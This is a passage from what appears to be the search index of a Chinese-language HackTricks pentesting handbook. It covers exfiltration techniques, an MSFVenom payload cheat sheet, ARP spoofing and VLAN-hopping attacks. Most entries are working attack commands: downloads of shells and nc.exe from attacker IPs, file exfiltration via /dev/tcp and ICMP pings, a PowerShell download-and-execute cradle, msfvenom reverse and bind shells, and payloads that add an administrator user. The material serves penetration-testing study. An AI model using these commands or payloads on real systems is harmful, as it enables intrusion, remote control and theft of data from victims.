/dev/shm/.rev.py\\nwget 10.10.14.14:8000/tcp_pty_backconnect.py -P /dev/shm\\ncurl 10.10.14.14:8000/shell.py -o /dev/shm/shell.py\\nfetch 10.10.14.14:8000/shell.py #FreeBSD Windows bash certutil -urlcache -split -f http://webserver/payload.b64 payload.b64\\nbitsadmin /transfer transfName /priority high http://example.com/examplefile.pdf C:\\\\downloads\\\\examplefile.pdf #PS\\n(New-Object Net.WebClient).DownloadFile(\\"http://10.10.14.2:80/taskkill.exe\\",\\"C:\\\\Windows\\\\Temp\\\\taskkill.exe\\")\\nInvoke-WebRequest \\"http://10.10.14.2:80/taskkill.exe\\" -OutFile \\"taskkill.exe\\"\\nwget \\"http://10.10.14.2/nc.bat.exe\\" -OutFile \\"C:\\\\ProgramData\\\\unifivideo\\\\taskkill.exe\\" Import-Module BitsTransfer\\nStart-BitsTransfer -Source $url -Destination $output\\n#OR\\nStart-BitsTransfer -Source $url -Destination $output -Asynchronous","breadcrumbs":"Exfiltration » HTTP","id":"1134","title":"HTTP"},"1135":{"body":"SimpleHttpServerWithFileUploads SimpleHttpServer 打印 GET 和 POST(以及头部) Python 模块 uploadserver : bash # Listen to files\\npython3 -m pip install --user uploadserver\\npython3 -m uploadserver\\n# With basic auth:\\n# python3 -m uploadserver --basic-auth hello:world # Send a file\\ncurl -X POST http://HOST/upload -H -F \'files=@file.txt\'\\n# With basic auth:\\n# curl -X POST http://HOST/upload -H -F \'files=@file.txt\' -u hello:world","breadcrumbs":"Exfiltration » 上传文件","id":"1135","title":"上传文件"},"1136":{"body":"python # from https://gist.github.com/dergachev/7028596\\n# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/\\n# generate server.xml with the following command:\\n# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes\\n# run as follows:\\n# python simple-https-server.py\\n# then in your browser, visit:\\n# https://localhost:443 ### PYTHON 2\\nimport BaseHTTPServer, SimpleHTTPServer\\nimport ssl httpd = BaseHTTPServer.HTTPServer((\'0.0.0.0\', 443), SimpleHTTPServer.SimpleHTTPRequestHandler)\\nhttpd.socket = ssl.wrap_socket (httpd.socket, certfile=\'./server.pem\', server_side=True)\\nhttpd.serve_forever()\\n### ### PYTHON3\\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\\nimport ssl httpd = HTTPServer((\'0.0.0.0\', 443), BaseHTTPRequestHandler)\\nhttpd.socket = ssl.wrap_socket(httpd.socket, certfile=\\"./server.pem\\", server_side=True)\\nhttpd.serve_forever()\\n### ### USING FLASK\\nfrom flask import Flask, redirect, request\\nfrom urllib.parse import quote\\napp = Flask(__name__)\\n@app.route(\'/\')\\ndef root():\\nprint(request.get_json())\\nreturn \\"OK\\"\\nif __name__ == \\"__main__\\":\\napp.run(ssl_context=\'adhoc\', debug=True, host=\\"0.0.0.0\\", port=8443)\\n###","breadcrumbs":"Exfiltration » HTTPS 服务器","id":"1136","title":"HTTPS 服务器"},"1137":{"body":"","breadcrumbs":"Exfiltration » FTP","id":"1137","title":"FTP"},"1138":{"body":"bash pip3 install pyftpdlib\\npython3 -m pyftpdlib -p 21","breadcrumbs":"Exfiltration » FTP 服务器 (python)","id":"1138","title":"FTP 服务器 (python)"},"1139":{"body":"sudo npm install -g ftp-srv --save\\nftp-srv ftp://0.0.0.0:9876 --root /tmp","breadcrumbs":"Exfiltration » FTP 服务器 (NodeJS)","id":"1139","title":"FTP 服务器 (NodeJS)"},"114":{"body":"显然。","breadcrumbs":"Pentesting Network » Wireshark","id":"114","title":"Wireshark"},"1140":{"body":"bash apt-get update && apt-get install pure-ftp bash #Run the following script to configure the FTP server\\n#!/bin/bash\\ngroupadd ftpgroup\\nuseradd -g ftpgroup -d /dev/null -s /etc ftpuser\\npure-pwd useradd fusr -u ftpuser -d /ftphome\\npure-pw mkdb\\ncd /etc/pure-ftpd/auth/\\nln -s ../conf/PureDB 60pdb\\nmkdir -p /ftphome\\nchown -R ftpuser:ftpgroup /ftphome/\\n/etc/init.d/pure-ftpd restart","breadcrumbs":"Exfiltration » FTP 服务器 (pure-ftp)","id":"1140","title":"FTP 服务器 (pure-ftp)"},"1141":{"body":"bash #Work well with python. With pure-ftp use fusr:ftp\\necho open 10.11.0.41 21 > ftp.txt\\necho USER anonymous >> ftp.txt\\necho anonymous >> ftp.txt\\necho bin >> ftp.txt\\necho GET mimikatz.exe >> ftp.txt\\necho bye >> ftp.txt\\nftp -n -v -s:ftp.txt","breadcrumbs":"Exfiltration » Windows 客户端","id":"1141","title":"Windows 客户端"},"1142":{"body":"Kali 作为服务器 bash kali_op1> impacket-smbserver -smb2support kali `pwd` # Share current directory\\nkali_op2> smbserver.py -smb2support name /path/folder # Share a folder\\n#For new Win10 versions\\nimpacket-smbserver -smb2support -user test -password test test `pwd` 或创建一个 smb 共享 使用 samba : bash apt-get install samba\\nmkdir /tmp/smb\\nchmod 777 /tmp/smb\\n#Add to the end of /etc/samba/smb.conf this:\\n[public]\\ncomment = Samba on Ubuntu\\npath = /tmp/smb\\nread only = no\\nbrowsable = yes\\nguest ok = Yes\\n#Start samba\\nservice smbd restart Windows bash CMD-Wind> \\\\\\\\10.10.14.14\\\\path\\\\to\\\\exe\\nCMD-Wind> net use z: \\\\\\\\10.10.14.14\\\\test /user:test test #For SMB using credentials WindPS-1> New-PSDrive -Name \\"new_disk\\" -PSProvider \\"FileSystem\\" -Root \\"\\\\\\\\10.10.14.9\\\\kali\\"\\nWindPS-2> cd new_disk:","breadcrumbs":"Exfiltration » SMB","id":"1142","title":"SMB"},"1143":{"body":"攻击者必须运行 SSHd。 bash scp @:/","breadcrumbs":"Exfiltration » SCP","id":"1143","title":"SCP"},"1144":{"body":"如果受害者有SSH,攻击者可以将受害者的目录挂载到攻击者。 bash sudo apt-get install sshfs\\nsudo mkdir /mnt/sshfs\\nsudo sshfs -o allow_other,default_permissions @:/ /mnt/sshfs/","breadcrumbs":"Exfiltration » SSHFS","id":"1144","title":"SSHFS"},"1145":{"body":"bash nc -lvnp 4444 > new_file\\nnc -vn 4444 < exfil_file","breadcrumbs":"Exfiltration » NC","id":"1145","title":"NC"},"1146":{"body":"","breadcrumbs":"Exfiltration » /dev/tcp","id":"1146","title":"/dev/tcp"},"1147":{"body":"bash nc -lvnp 80 > file #Inside attacker\\ncat /path/file > /dev/tcp/10.10.10.10/80 #Inside victim","breadcrumbs":"Exfiltration » 从受害者下载文件","id":"1147","title":"从受害者下载文件"},"1148":{"body":"bash nc -w5 -lvnp 80 < file_to_send.txt # Inside attacker\\n# Inside victim\\nexec 6< /dev/tcp/10.10.10.10/4444\\ncat <&6 > file.txt 感谢 @BinaryShadow_","breadcrumbs":"Exfiltration » 上传文件到受害者","id":"1148","title":"上传文件到受害者"},"1149":{"body":"bash # To exfiltrate the content of a file via pings you can do:\\nxxd -p -c 4 /path/file/exfil | while read line; do ping -c 1 -p $line ; done\\n#This will 4bytes per ping packet (you could probably increase this until 16) python from scapy.all import *\\n#This is ippsec receiver created in the HTB machine Mischief\\ndef process_packet(pkt):\\nif pkt.haslayer(ICMP):\\nif pkt[ICMP].type == 0:\\ndata = pkt[ICMP].load[-4:] #Read the 4bytes interesting\\nprint(f\\"{data.decode(\'utf-8\')}\\", flush=True, end=\\"\\") sniff(iface=\\"tun0\\", prn=process_packet)","breadcrumbs":"Exfiltration » ICMP","id":"1149","title":"ICMP"},"115":{"body":"你可以使用像 https://github.com/lgandx/PCredz 这样的工具从 pcap 或实时接口解析凭证。","breadcrumbs":"Pentesting Network » 捕获凭证","id":"115","title":"捕获凭证"},"1150":{"body":"如果您可以将数据发送到SMTP服务器,则可以使用Python创建一个SMTP来接收数据: bash sudo python -m smtpd -n -c DebuggingServer :25","breadcrumbs":"Exfiltration » SMTP","id":"1150","title":"SMTP"},"1151":{"body":"默认情况下在 XP 和 2003 中(在其他版本中需要在安装时显式添加) 在 Kali 中, 启动 TFTP 服务器 : bash #I didn\'t get this options working and I prefer the python option\\nmkdir /tftp\\natftpd --daemon --port 69 /tftp\\ncp /path/tp/nc.exe /tftp 在Python中的TFTP服务器: bash pip install ptftpd\\nptftpd -p 69 tap0 . # ptftp -p 在 受害者 上,连接到Kali服务器: bash tftp -i get nc.exe","breadcrumbs":"Exfiltration » TFTP","id":"1151","title":"TFTP"},"1152":{"body":"使用 PHP 单行代码下载文件: bash echo \\"\\" > down2.php","breadcrumbs":"Exfiltration » PHP","id":"1152","title":"PHP"},"1153":{"body":"bash Attacker> python -m SimpleHTTPServer 80 受害者 bash echo strUrl = WScript.Arguments.Item(0) > wget.vbs\\necho StrFile = WScript.Arguments.Item(1) >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs\\necho Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs\\necho Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs\\necho Err.Clear >> wget.vbs\\necho Set http = Nothing >> wget.vbs\\necho Set http = CreateObject(\\"WinHttp.WinHttpRequest.5.1\\") >> wget.vbs\\necho If http Is Nothing Then Set http = CreateObject(\\"WinHttp.WinHttpRequest\\") >> wget.vbs\\necho If http Is Nothing Then Set http =CreateObject(\\"MSXML2.ServerXMLHTTP\\") >> wget.vbs\\necho If http Is Nothing Then Set http = CreateObject(\\"Microsoft.XMLHTTP\\") >> wget.vbs\\necho http.Open \\"GET\\", strURL, False >> wget.vbs\\necho http.Send >> wget.vbs\\necho varByteArray = http.ResponseBody >> wget.vbs\\necho Set http = Nothing >> wget.vbs\\necho Set fs = CreateObject(\\"Scripting.FileSystemObject\\") >> wget.vbs\\necho Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs\\necho strData = \\"\\" >> wget.vbs\\necho strBuffer = \\"\\" >> wget.vbs\\necho For lngCounter = 0 to UBound(varByteArray) >> wget.vbs\\necho ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs\\necho Next >> wget.vbs\\necho ts.Close >> wget.vbs bash cscript wget.vbs http://10.11.0.5/evil.exe evil.exe","breadcrumbs":"Exfiltration » VBScript","id":"1153","title":"VBScript"},"1154":{"body":"debug.exe程序不仅允许检查二进制文件,还具有 从十六进制重建它们的能力 。这意味着通过提供二进制文件的十六进制,debug.exe可以生成二进制文件。然而,重要的是要注意,debug.exe 组装文件的大小限制为64 kb 。 bash # Reduce the size\\nupx -9 nc.exe\\nwine exe2bat.exe nc.exe nc.txt 然后将文本复制粘贴到 Windows Shell 中,将创建一个名为 nc.exe 的文件。 https://chryzsh.gitbooks.io/pentestbook/content/transfering_files_to_windows.html","breadcrumbs":"Exfiltration » Debug.exe","id":"1154","title":"Debug.exe"},"1155":{"body":"https://github.com/Stratiz/DNS-Exfil tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Exfiltration » DNS","id":"1155","title":"DNS"},"1156":{"body":"tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Shells - Linux","id":"1156","title":"Shells - Linux"},"1157":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Shells - Windows","id":"1157","title":"Shells - Windows"},"1158":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet","id":"1158","title":"MSFVenom - CheatSheet"},"1159":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Full TTYs","id":"1159","title":"Full TTYs"},"116":{"body":"","breadcrumbs":"Pentesting Network » 局域网攻击","id":"116","title":"局域网攻击"},"1160":{"body":"https://reverse-shell.sh/ https://www.revshells.com/ https://github.com/ShutdownRepo/shellerator https://github.com/0x00-0x00/ShellPop https://github.com/cybervaca/ShellReverse https://liftoff.github.io/pyminifier/ https://github.com/xct/xc/ https://weibell.github.io/reverse-shell-generator/ https://github.com/t0thkr1s/revshellgen https://github.com/mthbernardes/rsg tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » 自动生成的 Shell","id":"1160","title":"自动生成的 Shell"},"1161":{"body":"Reading time: 5 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » MSFVenom - CheatSheet","id":"1161","title":"MSFVenom - CheatSheet"},"1162":{"body":"msfvenom -p -e -f -i LHOST= 还可以使用 -a 来指定架构或 --platform","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 基本 msfvenom","id":"1162","title":"基本 msfvenom"},"1163":{"body":"bash msfvenom -l payloads #Payloads\\nmsfvenom -l encoders #Encoders","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 列表","id":"1163","title":"列表"},"1164":{"body":"bash -b \\"\\\\x00\\\\x0a\\\\x0d\\"\\n-f c\\n-e x86/shikata_ga_nai -i 5\\nEXITFUNC=thread\\nPrependSetuid=True #Use this to create a shellcode that will execute something with SUID","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 创建 shellcode 时的常见参数","id":"1164","title":"创建 shellcode 时的常见参数"},"1165":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Windows","id":"1165","title":"Windows"},"1166":{"body":"bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 反向 Shell","id":"1166","title":"反向 Shell"},"1167":{"body":"bash msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 绑定 Shell","id":"1167","title":"绑定 Shell"},"1168":{"body":"bash msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 创建用户","id":"1168","title":"创建用户"},"1169":{"body":"bash msfvenom -p windows/shell/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > prompt.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » CMD Shell","id":"1169","title":"CMD Shell"},"117":{"body":"ARP Spoofing 是通过发送 gratuitous ARPResponses 来表明某台机器的 IP 对应我们的设备的 MAC。然后,受害者会修改 ARP 表,并且每当想要联系该被伪造的 IP 时,都会联系到我们的机器。 Bettercap bash arp.spoof on\\nset arp.spoof.targets #Specific targets to ARP spoof (default=)\\nset arp.spoof.whitelist #Specific targets to skip while spoofing\\nset arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)\\nset arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false) Arpspoof bash echo 1 > /proc/sys/net/ipv4/ip_forward\\narpspoof -t 192.168.1.1 192.168.1.2\\narpspoof -t 192.168.1.2 192.168.1.1","breadcrumbs":"Pentesting Network » ARP spoofing","id":"117","title":"ARP spoofing"},"1170":{"body":"bash msfvenom -a x86 --platform Windows -p windows/exec CMD=\\"powershell \\\\\\"IEX(New-Object Net.webClient).downloadString(\'http://IP/nishang.ps1\')\\\\\\"\\" -f exe > pay.exe\\nmsfvenom -a x86 --platform Windows -p windows/exec CMD=\\"net localgroup administrators shaun /add\\" -f exe > pay.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 执行命令","id":"1170","title":"执行命令"},"1171":{"body":"bash msfvenom -p windows/meterpreter/reverse_tcp -e shikata_ga_nai -i 3 -f exe > encoded.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 编码器","id":"1171","title":"编码器"},"1172":{"body":"bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -x /usr/share/windows-binaries/plink.exe -f exe -o plinkmeter.exe","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 嵌入可执行文件中","id":"1172","title":"嵌入可执行文件中"},"1173":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Linux Payloads","id":"1173","title":"Linux Payloads"},"1174":{"body":"bash msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf\\nmsfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 反向 Shell","id":"1174","title":"反向 Shell"},"1175":{"body":"bash msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f elf > bind.elf","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 绑定 Shell","id":"1175","title":"绑定 Shell"},"1176":{"body":"bash msfvenom --platform=solaris --payload=solaris/x86/shell_reverse_tcp LHOST=(ATTACKER IP) LPORT=(ATTACKER PORT) -f elf -e x86/shikata_ga_nai -b \'\\\\x00\' > solshell.elf","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » SunOS (Solaris)","id":"1176","title":"SunOS (Solaris)"},"1177":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » MAC Payloads","id":"1177","title":"MAC Payloads"},"1178":{"body":"bash msfvenom -p osx/x86/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f macho > reverse.macho","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 反向Shell:","id":"1178","title":"反向Shell:"},"1179":{"body":"bash msfvenom -p osx/x86/shell_bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f macho > bind.macho","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 绑定 Shell","id":"1179","title":"绑定 Shell"},"118":{"body":"通过发送大量具有不同源 MAC 地址的数据包来使交换机的 CAM 表溢出。当 CAM 表满时,交换机会开始像集线器一样工作(广播所有流量)。 bash macof -i 在现代交换机中,这个漏洞已被修复。","breadcrumbs":"Pentesting Network » MAC Flooding - CAM overflow","id":"118","title":"MAC Flooding - CAM overflow"},"1180":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 基于网络的有效载荷","id":"1180","title":"基于网络的有效载荷"},"1181":{"body":"反向壳 l bash msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php\\ncat shell.php | pbcopy && echo \' shell.php && pbpaste >> shell.php","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » PHP","id":"1181","title":"PHP"},"1182":{"body":"反向 shell bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f asp >reverse.asp\\nmsfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f aspx >reverse.aspx","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » ASP/x","id":"1182","title":"ASP/x"},"1183":{"body":"反向 shell bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw> reverse.jsp","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » JSP","id":"1183","title":"JSP"},"1184":{"body":"反向 Shell bash msfvenom -p java/jsp_shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f war > reverse.war","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 战争","id":"1184","title":"战争"},"1185":{"body":"bash msfvenom -p nodejs/shell_reverse_tcp LHOST=(IP Address) LPORT=(Your Port)","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » NodeJS","id":"1185","title":"NodeJS"},"1186":{"body":"","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » 脚本语言有效载荷","id":"1186","title":"脚本语言有效载荷"},"1187":{"body":"bash msfvenom -p cmd/unix/reverse_perl LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.pl","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Perl","id":"1187","title":"Perl"},"1188":{"body":"bash msfvenom -p cmd/unix/reverse_python LHOST=(IP Address) LPORT=(Your Port) -f raw > reverse.py","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Python","id":"1188","title":"Python"},"1189":{"body":"bash msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » MSFVenom - CheatSheet » Bash","id":"1189","title":"Bash"},"119":{"body":"动态中继 The Dynamic Trunking Protocol (DTP) 是一个链路层协议,旨在实现一个自动中继系统,允许交换机自动选择端口进入 trunk 模式 (Trunk) 或 非 trunk 模式。部署 DTP 常被视为网络设计不佳的迹象,强调了仅在必要时手动配置中继并确保良好文档的重要性。 默认情况下,交换机端口被设置为以 Dynamic Auto 模式运行,这意味着当邻近交换机发起时,它们准备开始 trunking。安全问题出现在 pentester 或攻击者连接到交换机并发送 DTP Desirable frame,使端口进入 trunk 模式时。此操作使攻击者能够通过分析 STP 帧 来枚举 VLAN,并通过建立虚拟接口 绕过 VLAN 分段。 许多交换机默认启用 DTP,攻击者可借此模拟交换机行为,从而访问所有 VLAN 的流量。脚本 dtpscan.sh 可用于监视接口,显示交换机当前是 Default、Trunk、Dynamic、Auto 还是 Access 模式——后者是唯一对 VLAN hopping attacks 免疫的配置。该工具用于评估交换机的易受攻击状态。 如果识别出网络存在此类漏洞,可以使用 Yersinia 工具通过 DTP 协议“enable trunking”,从而观察来自所有 VLAN 的数据包。 bash apt-get install yersinia #Installation\\nsudo apt install kali-linux-large #Another way to install it in Kali\\nyersinia -I #Interactive mode\\n#In interactive mode you will need to select a interface first\\n#Then, you can select the protocol to attack using letter \\"g\\"\\n#Finally, you can select the attack using letter \\"x\\" yersinia -G #For graphic mode 要枚举 VLANs,也可以使用脚本 DTPHijacking.py **. 请 不要在任何情况下中断该脚本。它每三秒注入一次 DTP Desirable。 动态创建的 switch 上的 trunk 通道只存活五分钟。五分钟后,trunk 会掉线。 sudo python3 DTPHijacking.py --interface eth0 我想指出, Access/Desirable (0x03) 表示 DTP 帧是 Desirable 类型,这会指示端口切换到 Trunk 模式。并且 802.1Q/802.1Q (0xa5 表示 802.1Q 封装类型。 通过分析 STP 帧, 我们了解到 VLAN 30 和 VLAN 60 的存在。 针对特定 VLAN 的攻击 一旦你知道 VLAN IDs 和 IPs 值,你可以 配置一个虚拟接口以攻击特定 VLAN . 如果 DHCP 不可用,则使用 ifconfig 设置静态 IP 地址。 root@kali:~# modprobe 8021q\\nroot@kali:~# vconfig add eth1 250\\nAdded VLAN with VID == 250 to IF -:eth1:-\\nroot@kali:~# dhclient eth1.250\\nReloading /etc/samba/smb.conf: smbd only.\\nroot@kali:~# ifconfig eth1.250\\neth1.250 Link encap:Ethernet HWaddr 00:0e:c6:f0:29:65\\ninet addr:10.121.5.86 Bcast:10.121.5.255 Mask:255.255.255.0\\ninet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link\\nUP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1\\nRX packets:19 errors:0 dropped:0 overruns:0 frame:0\\nTX packets:13 errors:0 dropped:0 overruns:0 carrier:0\\ncollisions:0 txqueuelen:0\\nRX bytes:2206 (2.1 KiB) TX bytes:1654 (1.6 KiB) root@kali:~# arp-scan -I eth1.250 10.121.5.0/24 bash # Another configuration example\\nmodprobe 8021q\\nvconfig add eth1 20\\nifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up bash # Another configuration example\\nsudo vconfig add eth0 30\\nsudo ip link set eth0.30 up\\nsudo dhclient -v eth0.30 Automatic VLAN Hopper 前面讨论的针对其他 VLAN 的、涉及 Dynamic Trunking and creating virtual interfaces an discovering hosts inside 的攻击可以由该工具 自动执行 : https://github.com/nccgroup/vlan-hopping---frogger Double Tagging 如果攻击者知道受害主机的 MAC, IP and VLAN ID of the victim host ,他可以尝试对一个帧进行 double tag a frame (同时带上其本身的 VLAN 和受害者的 VLAN)并发送该数据包。由于 victim won\'t be able to connect back 给攻击者, best option for the attacker is communicate via UDP ,可选择像 SNMP 这样能执行某些有趣操作的协议。 攻击者的另一个选择是发起对 TCP port scan spoofing an IP controlled by the attacker and accessible by the victim (可能通过 internet)。然后,如果受害者向攻击者控制的第二台主机发送了数据包,攻击者就可以在该主机上嗅探到这些数据包。 要执行此攻击可以使用 scapy: pip install scapy python from scapy.all import *\\n# Double tagging with ICMP packet (the response from the victim isn\'t double tagged so it will never reach the attacker)\\npacket = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst=\'192.168.1.10\')/ICMP()\\nsendp(packet) Lateral VLAN Segmentation Bypass 如果你 能够访问你直接连接的 switch ,就有能力在网络内 bypass VLAN segmentation 。只需将端口 切换到 trunk 模式 (也称为 trunk),为目标 VLAN 的 ID 创建虚拟接口,并配置一个 IP 地址。你可以尝试动态请求地址(DHCP),也可以静态配置,视具体情况而定。 Lateral VLAN Segmentation Bypass Layer 3 Private VLAN 绕过 在某些环境(例如 guest wireless networks)中,会实施 port isolation(也称为 private VLAN) 设置以防止连接到同一无线接入点的客户端彼此直接通信。然而,已发现一种可以规避这些隔离措施的技术。该技术利用网络 ACL 的缺失或配置不当,使得 IP 包可以通过 router 被路由到同一网络上的另一个客户端。 该攻击通过构造一个 携带目标客户端 IP 但使用 router 的 MAC 的数据包 来执行。这会导致 router 错误地将数据包转发到目标客户端。此方法类似于 Double Tagging Attacks 中使用的方式,即利用能够控制的、对受害者可访问的主机来利用该安全缺陷。 攻击的关键步骤: 构造数据包: 特别构造一个数据包,包含目标客户端的 IP,但使用 router 的 MAC 地址。 利用 router 行为: 将该构造的数据包发送到 router,由于配置原因,router 将数据包重定向到目标客户端,从而绕过 private VLAN 设置提供的隔离。","breadcrumbs":"Pentesting Network » 802.1Q VLAN / DTP 攻击","id":"119","title":"802.1Q VLAN / DTP 攻击"},"1190":{"body":"Reading time: 18 minutes tip 学习和实践 AWS 黑客技术: HackTricks Training AWS Red Team Expert (ARTE) 学习和实践 GCP 黑客技术: HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术: HackTricks Training Azure Red Team Expert (AzRTE) 支持 HackTricks 查看 订阅计划 ! 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live . 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。","breadcrumbs":"Reverse Shells (Linux, Windows, MSFVenom) » Reverse Shells - Windows » Shells - Windows","id":"1190","title":"Shells - Windows"},"1191":{"body":"页面 lolbas-project.github.io 面向 Windows,就像 https://gtfobins.github.io/ 面向 linux。 显然, 